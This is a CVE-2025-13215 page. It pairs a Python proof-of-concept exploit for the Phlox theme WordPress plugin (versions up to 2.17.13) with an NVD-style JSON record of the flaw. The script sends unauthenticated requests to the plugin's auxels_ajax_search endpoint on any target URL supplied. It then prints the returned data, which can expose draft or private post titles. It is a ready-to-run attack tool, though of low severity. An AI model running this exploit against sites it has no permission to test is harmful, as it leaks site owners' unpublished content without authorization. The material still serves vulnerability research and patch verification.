CVE-2025-13215

import requests import sys # CVE-2025-13215 PoC - Information Disclosure in Phlox theme plugin # Target: WordPress site with Phlox theme plugin < 2.17.14 def exploit_cve_2025_13215(target_url): """ Exploit information disclosure vulnerability in auxels_ajax_search This PoC demonstrates how an unauthenticated attacker can extract draft/private post titles that should not be accessible. """ # Target endpoint for AJAX requests ajax_endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php" # Construct search query to trigger auxels_ajax_search params = { 'action': 'auxels_ajax_search', 'term': '', # Empty or specific term to search 'post_type': 'post' # Can be modified to target other post types } print(f"[*] Targeting: {target_url}") print(f"[*] Exploiting endpoint: {ajax_endpoint}") print("[*] Sending request to auxels_ajax_search...") try: # Send unauthenticated request response = requests.get(ajax_endpoint, params=params, timeout=10) if response.status_code == 200: print(f"[+] Response received (Status: {response.status_code})") print("[*] Response content:") print(response.text[:500]) # Print first 500 chars # Check if response contains post titles that should be protected if 'id:' in response.text or 'title:' in response.text: print("[!] VULNERABLE: Protected post information exposed!") return True else: print("[-] No obvious information disclosure detected") return False else: print(f"[-] Request failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-13215.py <target_url>") print("Example: python cve-2025-13215.py http://target.com") sys.exit(1) target = sys.argv[1] exploit_cve_2025_13215(target)

{"cve": {"id": "CVE-2025-13215", "sourceIdentifier": "[email protected]", "published": "2026-01-06T07:15:42.663", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.17.13 via the auxels_ajax_search due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to extract titles of draft posts that they should not have access to."}, {"lang": "es", "value": "El plugin Shortcodes and extra features for Phlox theme para WordPress es vulnerable a la Exposición de Información en todas las versiones hasta la 2.17.13, inclusive, a través de auxels_ajax_search debido a restricciones insuficientes sobre qué publicaciones pueden incluirse. Esto hace posible que atacantes no autenticados extraigan títulos de publicaciones en borrador a las que no deberían tener acceso."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/auxin-elements/tags/2.17.12/public/includes/frontend-ajax.php#L348", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7f47ab91-7d91-4231-91ef-66c556ad8496?source=cve", "source": "[email protected]"}]}}